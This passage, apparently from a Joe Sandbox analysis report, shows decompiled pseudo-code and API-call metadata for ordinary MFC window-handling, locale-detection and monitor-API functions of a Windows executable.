                  												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
                  												goto L38;
                  											} else {
                  												_t147 = E00410A43(_t164,  *(_t204 - 0x10));
                  												__eflags = _t147;
                  												if(_t147 == 0) {
                  													L38:
                  													_t192 =  *((intOrPtr*)(_t204 - 0x18));
                  													goto L39;
                  												}
                  												goto L35;
                  											}
                  										}
                  										__eflags =  *(_t192 + 0x40) - _t175;
                  										if( *(_t192 + 0x40) != _t175) {
                  											goto L30;
                  										}
                  										__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 != 0xffffffff) {
                  												_t109 = E004270A9(_t164,  *((intOrPtr*)(_t204 + 8)));
                  											}
                  										} else {
                  											GetCursorPos(_t204 - 0x20);
                  											_t109 = SendMessageW( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
                  										}
                  										goto L45;
                  									} else {
                  										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
                  										goto L77;
                  									}
                  								}
                  								_t156 = E0040F5D8(_t164);
                  								__eflags = _t156 -  *(_t204 - 0x14);
                  								if(_t156 !=  *(_t204 - 0x14)) {
                  									 *((intOrPtr*)( *_t164 + 0x60))();
                  									 *((intOrPtr*)( *_t164 + 4))(1);
                  									_t164 = 0;
                  									__eflags = 0;
                  									 *(_t192 + 0x3c) = 0;
                  								}
                  								__eflags = _t164;
                  								if(__eflags != 0) {
                  									goto L24;
                  								} else {
                  									goto L19;
                  								}
                  							} else {
                  								if(_t109 == 0) {
                  									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
                  									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
                  								}
                  								goto L77;
                  							}
                  						}
                  					}
                  				} else {
                  					L50:
                  					__eflags =  *(_t200 + 0x3c) & 0x00000401;
                  					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
                  						L77:
                  						return E00429303(_t109);
                  					}
                  					_push( *_t163);
                  					while(1) {
                  						_t109 = E0040E20E(_t163, _t165);
                  						__eflags = _t109;
                  						if(_t109 == 0) {
                  							break;
                  						}
                  						__eflags = _t109 - _t200;
                  						if(_t109 == _t200) {
                  							L57:
                  							__eflags = _t190 - 0x100;
                  							if(_t190 < 0x100) {
                  								L59:
                  								__eflags = _t190 - 0x104 - 3;
                  								if(_t190 - 0x104 > 3) {
                  									_t109 = 0;
                  									__eflags = 0;
                  									L62:
                  									__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
                  										goto L77;
                  									}
                  									__eflags = _t109;
                  									if(__eflags != 0) {
                  										L76:
                  										_t109 = E0040CE8F(_t165, __eflags, _t109);
                  										goto L77;
                  									}
                  									__eflags = _t190 - 0x201;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x203;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x204;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x206;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x207;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x209;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa1;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa3;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa4;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa6;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa7;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa9;
                  									if(__eflags != 0) {
                  										goto L77;
                  									}
                  									goto L76;
                  								}
                  								L60:
                  								_t109 = 1;
                  								goto L62;
                  							}
                  							__eflags = _t190 - 0x109;
                  							if(_t190 <= 0x109) {
                  								goto L60;
                  							}
                  							goto L59;
                  						}
                  						__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  							break;
                  						}
                  						_push(GetParent( *(_t109 + 0x20)));
                  					}
                  					__eflags = _t109 - _t200;
                  					if(_t109 != _t200) {
                  						goto L77;
                  					}
                  					goto L57;
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427130
                  • GetKeyState.USER32(00000001), ref: 00427177
                  • GetKeyState.USER32(00000002), ref: 00427184
                  • GetKeyState.USER32(00000004), ref: 00427191
                  • GetParent.USER32(?), ref: 004271B6
                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00427262
                  • _memset.LIBCMT ref: 00427279
                  • ScreenToClient.USER32(?,?), ref: 00427297
                  • _memset.LIBCMT ref: 004272A5
                  • GetCursorPos.USER32(?), ref: 004272EB
                  • SendMessageW.USER32(?,00000412,00000000,?), ref: 00427309
                  • SendMessageW.USER32(?,00000432,00000000,?), ref: 00427378
                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0042739E
                  • SendMessageW.USER32(?,00000411,00000001,?), ref: 004273BD
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 004273D0
                  • SendMessageW.USER32(?,00000433,00000000,?), ref: 004273FA
                  • _memset.LIBCMT ref: 0042741F
                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00427460
                  • GetParent.USER32(?), ref: 0042748F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: 25e2d9dbc58f162ad463248b352d55aa5e29997971bef67a01b960febd43a57a
                  • Instruction ID: e8292259f50bfa0b50ff85a85b3b8cca184b95d8ca5375fe5bd6b1bc9ff05af8
                  • Opcode Fuzzy Hash: 25e2d9dbc58f162ad463248b352d55aa5e29997971bef67a01b960febd43a57a
                  • Instruction Fuzzy Hash: A4C1ED71B04225AFDF209F64EC88BAEBBB5BF04310F91016BF945A72E1C7789850CB59
                  Uniqueness

                  Uniqueness Score: 37.75%

                  C-Code - Quality: 87%
                  			E0041D0F2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t61;
                  				_Unknown_base(*)()* _t62;
                  				struct HINSTANCE__* _t63;
                  				struct HINSTANCE__* _t77;
                  				unsigned int _t80;
                  				signed short _t88;
                  				unsigned int _t89;
                  				_Unknown_base(*)()* _t96;
                  				signed short _t98;
                  				unsigned int _t99;
                  				signed int _t107;
                  				signed int _t119;
                  				signed int _t128;
                  				void* _t131;
                  
                  				_push(0x260);
                  				E00429294(E0043921F, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t131 - 0x228)) =  *((intOrPtr*)(_t131 + 8));
                  				_t124 = 0;
                  				 *((intOrPtr*)(_t131 - 0x234)) =  *((intOrPtr*)(_t131 + 0xc));
                  				 *(_t131 - 0x224) = 0;
                  				 *(_t131 - 0x220) = 0;
                  				_t61 = GetModuleHandleW(L"kernel32.dll");
                  				_t107 = GetProcAddress;
                  				 *(_t131 - 0x238) = _t61;
                  				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
                  				if(_t62 == 0) {
                  					_t63 = GetModuleHandleW(L"ntdll.dll");
                  					if(_t63 != 0) {
                  						 *(_t131 - 0x224) = 0;
                  						EnumResourceLanguagesW(_t63, 0x10, 1, E0041CA13, _t131 - 0x224);
                  						if( *(_t131 - 0x224) != 0) {
                  							_t80 =  *(_t131 - 0x224) & 0x0000ffff;
                  							_t124 = _t80 & 0x3ff;
                  							 *((intOrPtr*)(_t131 - 0x24c)) = ConvertDefaultLocale(_t80 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t124);
                  							 *((intOrPtr*)(_t131 - 0x248)) = ConvertDefaultLocale(_t124);
                  							 *(_t131 - 0x220) = 2;
                  						}
                  					}
                  				} else {
                  					_t88 =  *_t62() & 0x0000ffff;
                  					 *(_t131 - 0x224) = _t88;
                  					_t89 = _t88 & 0x0000ffff;
                  					_t124 = 0x3ff;
                  					_t119 = _t89 & 0x3ff;
                  					 *(_t131 - 0x220) = _t119;
                  					 *((intOrPtr*)(_t131 - 0x24c)) = ConvertDefaultLocale(_t89 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t119);
                  					 *((intOrPtr*)(_t131 - 0x248)) = ConvertDefaultLocale( *(_t131 - 0x220));
                  					 *(_t131 - 0x220) = 2;
                  					_t96 = GetProcAddress( *(_t131 - 0x238), "GetSystemDefaultUILanguage");
                  					if(_t96 != 0) {
                  						_t98 =  *_t96() & 0x0000ffff;
                  						 *(_t131 - 0x224) = _t98;
                  						_t99 = _t98 & 0x0000ffff;
                  						_t124 = _t99 & 0x3ff;
                  						 *((intOrPtr*)(_t131 - 0x244)) = ConvertDefaultLocale(_t99 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t124);
                  						 *((intOrPtr*)(_t131 - 0x240)) = ConvertDefaultLocale(_t124);
                  						 *(_t131 - 0x220) = 4;
                  					}
                  				}
                  				 *(_t131 - 0x220) = 1 +  *(_t131 - 0x220);
                  				 *((intOrPtr*)(_t131 +  *(_t131 - 0x220) * 4 - 0x24c)) = 0x800;
                  				 *((short*)(_t131 - 0x12)) = 0;
                  				 *((short*)(_t131 - 0x14)) = 0;
                  				_t127 = 0x400000;
                  				if(GetModuleFileNameW(0x400000, _t131 - 0x21c, 0x105) != 0) {
                  					_t124 = 0x20;
                  					_t107 = 0;
                  					E004281D0(_t124, _t131 - 0x26c, 0, _t124);
                  					 *(_t131 - 0x26c) = _t124;
                  					 *((intOrPtr*)(_t131 - 0x264)) = _t131 - 0x21c;
                  					 *((intOrPtr*)(_t131 - 0x258)) = 0x3e8;
                  					 *(_t131 - 0x250) = 0x400000;
                  					 *((intOrPtr*)(_t131 - 0x268)) = 0x88;
                  					E0041CA2D(_t131 - 0x230, 0xffffffff);
                  					 *(_t131 - 4) = 0;
                  					if(E0041CAE4(_t131 - 0x230, _t131 - 0x26c) != 0) {
                  						E0041CB1E(_t131 - 0x230);
                  					}
                  					_t128 = 0;
                  					if( *(_t131 - 0x220) <= _t107) {
                  						L13:
                  						_t127 = 0;
                  						goto L15;
                  					} else {
                  						while(1) {
                  							_t77 = E0041CEDC( *((intOrPtr*)(_t131 - 0x228)),  *((intOrPtr*)(_t131 - 0x234)),  *((intOrPtr*)(_t131 + _t128 * 4 - 0x24c)));
                  							if(_t77 != _t107) {
                  								_t127 = _t77;
                  								break;
                  							}
                  							_t128 = 1 + _t128;
                  							if(_t128 <  *(_t131 - 0x220)) {
                  								continue;
                  							}
                  							goto L13;
                  						}
                  						L15:
                  						 *(_t131 - 4) =  *(_t131 - 4) | 0xffffffff;
                  						E0041CFA8(_t131 - 0x230);
                  						goto L7;
                  					}
                  				}
                  				L7:
                  				return E00429317(_t107, _t124, _t127);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041D0FC
                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,0041D3CA,?,?), ref: 0041D12C
                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041D140
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D17C
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D18A
                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0041D1A7
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D1D2
                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041D1DB
                  • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0041D1F4
                  • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_0001CA13,?), ref: 0041D211
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D244
                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 0041D24D
                  • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041D292
                  • _memset.LIBCMT ref: 0041D2B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                  • API String ID: 3537336938-2299501126
                  • Opcode ID: 08cbc78f7928a1b7030f64c802fcb25947cf46e16f856135de442db56c83a13a
                  • Instruction ID: 5055a041d8b6025664242cdcc6e5d04ab3b20b4860e7019f66e730600861f421
                  • Opcode Fuzzy Hash: 08cbc78f7928a1b7030f64c802fcb25947cf46e16f856135de442db56c83a13a
                  • Instruction Fuzzy Hash: 3A512271D412289ADB60DFA5DC887EEB7B4EF58300F1001EBA458E3291D7788E81DF59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 87%
                  			E0040B7ED() {
                  				void* __ebx;
                  				void* __esi;
                  				void* _t5;
                  				_Unknown_base(*)()* _t6;
                  				_Unknown_base(*)()* _t7;
                  				_Unknown_base(*)()* _t8;
                  				_Unknown_base(*)()* _t9;
                  				_Unknown_base(*)()* _t10;
                  				_Unknown_base(*)()* _t11;
                  				_Unknown_base(*)()* _t12;
                  				signed int _t16;
                  				signed int _t17;
                  				struct HINSTANCE__* _t19;
                  				void* _t21;
                  				void* _t24;
                  				void* _t25;
                  
                  				_t17 = _t16 ^ _t16;
                  				_t24 =  *0x44f5cc - _t17; // 0x0
                  				if(_t24 == 0) {
                  					_push(_t21);
                  					 *0x44f5d0 = E0040B793(_t17, _t21, __eflags);
                  					_t19 = GetModuleHandleW(L"USER32");
                  					__eflags = _t19 - _t17;
                  					if(_t19 == _t17) {
                  						L15:
                  						 *0x44f5b0 = _t17;
                  						 *0x44f5b4 = _t17;
                  						 *0x44f5b8 = _t17;
                  						 *0x44f5bc = _t17;
                  						 *0x44f5c0 = _t17;
                  						 *0x44f5c4 = _t17;
                  						 *0x44f5c8 = _t17;
                  						_t5 = 0;
                  					} else {
                  						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
                  						 *0x44f5b0 = _t6;
                  						__eflags = _t6 - _t17;
                  						if(_t6 == _t17) {
                  							goto L15;
                  						} else {
                  							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
                  							 *0x44f5b4 = _t7;
                  							__eflags = _t7 - _t17;
                  							if(_t7 == _t17) {
                  								goto L15;
                  							} else {
                  								_t8 = GetProcAddress(_t19, "MonitorFromRect");
                  								 *0x44f5b8 = _t8;
                  								__eflags = _t8 - _t17;
                  								if(_t8 == _t17) {
                  									goto L15;
                  								} else {
                  									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
                  									 *0x44f5bc = _t9;
                  									__eflags = _t9 - _t17;
                  									if(_t9 == _t17) {
                  										goto L15;
                  									} else {
                  										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
                  										 *0x44f5c4 = _t10;
                  										__eflags = _t10 - _t17;
                  										if(_t10 == _t17) {
                  											goto L15;
                  										} else {
                  											_t11 = GetProcAddress(_t19, "EnumDisplayDevicesW");
                  											 *0x44f5c8 = _t11;
                  											__eflags = _t11 - _t17;
                  											if(_t11 == _t17) {
                  												goto L15;
                  											} else {
                  												__eflags =  *0x44f5d0 - _t17; // 0x0
                  												if(__eflags == 0) {
                  													_push("GetMonitorInfoA");
                  												} else {
                  													_push("GetMonitorInfoW");
                  												}
                  												_t12 = GetProcAddress(_t19, ??);
                  												 *0x44f5c0 = _t12;
                  												__eflags = _t12 - _t17;
                  												if(_t12 == _t17) {
                  													goto L15;
                  												} else {
                  													_t5 = 1;
                  													__eflags = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					 *0x44f5cc = 1;
                  					return _t5;
                  				} else {
                  					_t25 =  *0x44f5c0 - _t17; // 0x0
                  					return 0 | _t25 != 0x00000000;
                  				}
                  			}




















                  APIs
                  • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75B8555C,0040B955,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B818
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B834
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B849
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B85A
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B86B
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B87C
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B88D
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B8AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-2451437823
                  • Opcode ID: 150a876f6c0a2e6448bf27e84db6917e01c20c524be58b6b0a26430167b67732
                  • Instruction ID: ab152e668f045b02aa06dd0bfa64d67021dfdd473995cccf1f9d9a882e2a9e4c
                  • Opcode Fuzzy Hash: 150a876f6c0a2e6448bf27e84db6917e01c20c524be58b6b0a26430167b67732
                  • Instruction Fuzzy Hash: 322171BB924291BFC711AF75BCC442A3AE8F74A701724847FD102E22A1E378044D9E9D
                  Uniqueness

                  Uniqueness Score: 0.51%

                  C-Code - Quality: 90%
                  			E0040FF58(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t53;
                  				void _t60;
                  				long _t61;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				signed int _t77;
                  				int _t79;
                  				signed int _t82;
                  				int _t86;
                  				void* _t93;
                  				void* _t97;
                  				long _t99;
                  				signed int _t100;
                  				WCHAR* _t102;
                  				intOrPtr _t103;
                  				void* _t105;
                  				void* _t108;
                  
                  				_t108 = __eflags;
                  				_push(0x248);
                  				E00429294(E004389FD, __ebx, __edi, __esi);
                  				_t99 =  *(_t105 + 0x10);
                  				_t86 =  *(_t105 + 0xc);
                  				_push(E0040C879);
                  				 *(_t105 - 0x21c) = _t99;
                  				_t97 = E0041F599(_t86, 0x44fa10, __edi, _t99, _t108);
                  				if((0 | _t97 != 0x00000000) == 0) {
                  					E00413DD0(0x44fa10);
                  				}
                  				if( *(_t105 + 8) == 3) {
                  					_t100 =  *(_t97 + 0x14);
                  					 *(_t105 - 0x214) =  *_t99;
                  					_t53 =  *(E0042083D(_t86, _t97, _t100, __eflags) + 0x14) & 0x000000ff;
                  					 *(_t105 - 0x218) = _t53;
                  					__eflags = _t100;
                  					if(__eflags != 0) {
                  						E00420889(_t105 - 0x224, __eflags,  *((intOrPtr*)(_t100 + 0x1c)));
                  						 *(_t105 - 4) =  *(_t105 - 4) & 0x00000000;
                  						E0040E25B(_t100, _t86);
                  						 *((intOrPtr*)( *_t100 + 0x50))();
                  						 *(_t105 - 0x214) =  *((intOrPtr*)( *_t100 + 0xf8))();
                  						_t60 = SetWindowLongW(_t86, 0xfffffffc, E0040EBA4);
                  						__eflags = _t60 - E0040EBA4;
                  						if(_t60 != E0040EBA4) {
                  							 *( *(_t105 - 0x214)) = _t60;
                  						}
                  						 *(_t97 + 0x14) =  *(_t97 + 0x14) & 0x00000000;
                  						 *(_t105 - 4) =  *(_t105 - 4) | 0xffffffff;
                  						__eflags =  *(_t105 - 0x220);
                  						if( *(_t105 - 0x220) != 0) {
                  							_push( *((intOrPtr*)(_t105 - 0x224)));
                  							_push(0);
                  							E0041FF9A();
                  						}
                  						L21:
                  						_t61 = CallNextHookEx( *(_t97 + 0x28), 3, _t86,  *(_t105 - 0x21c));
                  						__eflags =  *(_t105 - 0x218);
                  						_t99 = _t61;
                  						if( *(_t105 - 0x218) != 0) {
                  							UnhookWindowsHookEx( *(_t97 + 0x28));
                  							_t44 = _t97 + 0x28;
                  							 *_t44 =  *(_t97 + 0x28) & 0x00000000;
                  							__eflags =  *_t44;
                  						}
                  						goto L24;
                  					}
                  					_t93 =  *(_t105 - 0x214);
                  					__eflags =  *(_t93 + 0x20) & 0x40000000;
                  					if(( *(_t93 + 0x20) & 0x40000000) != 0) {
                  						goto L21;
                  					}
                  					__eflags = _t53;
                  					if(_t53 != 0) {
                  						goto L21;
                  					}
                  					__eflags =  *0x44f73c - _t100; // 0x0
                  					if(__eflags != 0) {
                  						L9:
                  						__eflags = (GetClassLongW(_t86, 0xffffffe0) & 0x0000ffff) -  *0x44f73c; // 0x0
                  						if(__eflags != 0) {
                  							L17:
                  							_t68 = GetWindowLongW(_t86, 0xfffffffc);
                  							 *(_t105 - 0x214) = _t68;
                  							__eflags = _t68;
                  							if(_t68 != 0) {
                  								_t102 = L"AfxOldWndProc423";
                  								_t69 = GetPropW(_t86, _t102);
                  								__eflags = _t69;
                  								if(_t69 == 0) {
                  									SetPropW(_t86, _t102,  *(_t105 - 0x214));
                  									_t71 = GetPropW(_t86, _t102);
                  									__eflags = _t71 -  *(_t105 - 0x214);
                  									if(_t71 ==  *(_t105 - 0x214)) {
                  										GlobalAddAtomW(_t102);
                  										SetWindowLongW(_t86, 0xfffffffc, E0040FE0B);
                  									}
                  								}
                  							}
                  						} else {
                  						}
                  						goto L21;
                  					}
                  					_t103 = 0x30;
                  					E004281D0(_t97, _t105 - 0x254, _t53, _t103);
                  					 *((intOrPtr*)(_t105 - 0x254)) = _t103;
                  					_push(_t105 - 0x254);
                  					_t104 = L"#32768";
                  					_push(L"#32768");
                  					_push(0);
                  					_t77 = E0040C9E7(_t86, _t93, _t97, L"#32768", __eflags);
                  					 *0x44f73c = _t77;
                  					__eflags = _t77;
                  					if(_t77 == 0) {
                  						_t79 = GetClassNameW(_t86, _t105 - 0x210, 0x100);
                  						__eflags = _t79;
                  						if(_t79 == 0) {
                  							goto L17;
                  						}
                  						 *((short*)(_t105 - 0x12)) = 0;
                  						_t82 = E004293B0(_t105 - 0x210, _t104);
                  						__eflags = _t82;
                  						if(_t82 == 0) {
                  							goto L21;
                  						}
                  						goto L17;
                  					}
                  					goto L9;
                  				} else {
                  					CallNextHookEx( *(_t97 + 0x28),  *(_t105 + 8), _t86, _t99);
                  					L24:
                  					return E00429317(_t86, _t97, _t99);
                  				}
                  			}






















                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040FF62
                    • Part of subcall function 0041F599: __EH_prolog3.LIBCMT ref: 0041F5A0
                  • CallNextHookEx.USER32(?,?,?,?), ref: 0040FFA2
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • _memset.LIBCMT ref: 0040FFFB
                  • GetClassLongW.USER32(?,000000E0), ref: 0041002F
                  • SetWindowLongW.USER32(?,000000FC,Function_0000EBA4), ref: 00410084
                  • GetClassNameW.USER32(?,?,00000100), ref: 004100CA
                  • GetWindowLongW.USER32(?,000000FC), ref: 004100F0
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 00410107
                  • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 00410119
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 00410121
                  • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00410130
                  • SetWindowLongW.USER32(?,000000FC,Function_0000FE0B), ref: 0041013E
                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00410150
                  • UnhookWindowsHookEx.USER32(?), ref: 00410164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Long$HookPropWindow$CallClassNext$AtomException@8GlobalH_prolog3H_prolog3_NameThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423
                  • API String ID: 157520791-2141921550
                  • Opcode ID: 477f9c85b758973ab3a3ea37016946061aa3c85da39c832f7ac9e7fc716f4410
                  • Instruction ID: 36fc6742a3902fc3b987d56ef4adef1f9284026439dbae15b0827b2b8d740c14
                  • Opcode Fuzzy Hash: 477f9c85b758973ab3a3ea37016946061aa3c85da39c832f7ac9e7fc716f4410
                  • Instruction Fuzzy Hash: 6251A571540225ABCB21AF61DC4CBDB7BB8AF14315F1041AAF409E6291DB7C8ED1CBA9
                  Uniqueness

                  Uniqueness Score: 6.84%

                  C-Code - Quality: 94%
                  			E00418492(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				WCHAR* _t148;
                  				void* _t157;
                  				int _t191;
                  				int _t225;
                  				int _t227;
                  				int _t230;
                  				intOrPtr* _t241;
                  				intOrPtr* _t250;
                  				signed int* _t252;
                  				int _t259;
                  				int _t261;
                  				void* _t264;
                  				int _t314;
                  				void* _t335;
                  				int _t339;
                  				int _t340;
                  				int _t346;
                  				struct HWND__** _t347;
                  				int _t348;
                  				int _t349;
                  				struct tagMENUITEMINFOW _t350;
                  				int _t351;
                  				void* _t353;
                  				void* _t356;
                  
                  				_t356 = __eflags;
                  				_t335 = __edx;
                  				_push(0x174);
                  				E0042922B(E00439052, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
                  				E00404820(_t353 - 0x10);
                  				_t337 = lstrlenW;
                  				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
                  				_t258 = L"ReBarWindow32";
                  				_t346 = lstrlenW(L"ReBarWindow32") + 1;
                  				_t148 = E00405860(_t353 - 0x10, _t356, _t346);
                  				_t347 =  *(_t353 + 0xc);
                  				GetClassNameW( *_t347, _t148, _t346);
                  				E0040E100(L"ReBarWindow32", _t353 - 0x10, lstrlenW, 0xffffffff);
                  				 *(_t353 - 0x14) = E0040E23A(_t258, _t353 - 0x10, lstrlenW, _t347, _t356,  *_t347);
                  				if(E0041744E(_t258, _t353 - 0x10, lstrlenW, _t347, _t258) != 0) {
                  					L37:
                  					_t348 = 0;
                  					L6:
                  					E004055F0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0);
                  					return E00429303(_t348);
                  				}
                  				_t259 =  *(_t353 - 0x14);
                  				if(_t259 == 0 || E0041EF6A(_t259, 0x440b68) == 0) {
                  					goto L37;
                  				} else {
                  					_t157 = E0040ED1C(_t259);
                  					if(_t157 == 0) {
                  						L7:
                  						E0041F9DD(_t259, _t353 - 0x78, _t337, _t347, __eflags);
                  						E00404820(_t353 + 8);
                  						E00404820(_t353 + 0xc);
                  						 *(_t353 - 4) = 3;
                  						E004141D8(_t353 - 0x4c);
                  						_push( *((intOrPtr*)(_t353 - 0x18)));
                  						 *(_t353 - 4) = 4;
                  						E004146FE(_t259, _t353 - 0xac, _t337, _t347, __eflags);
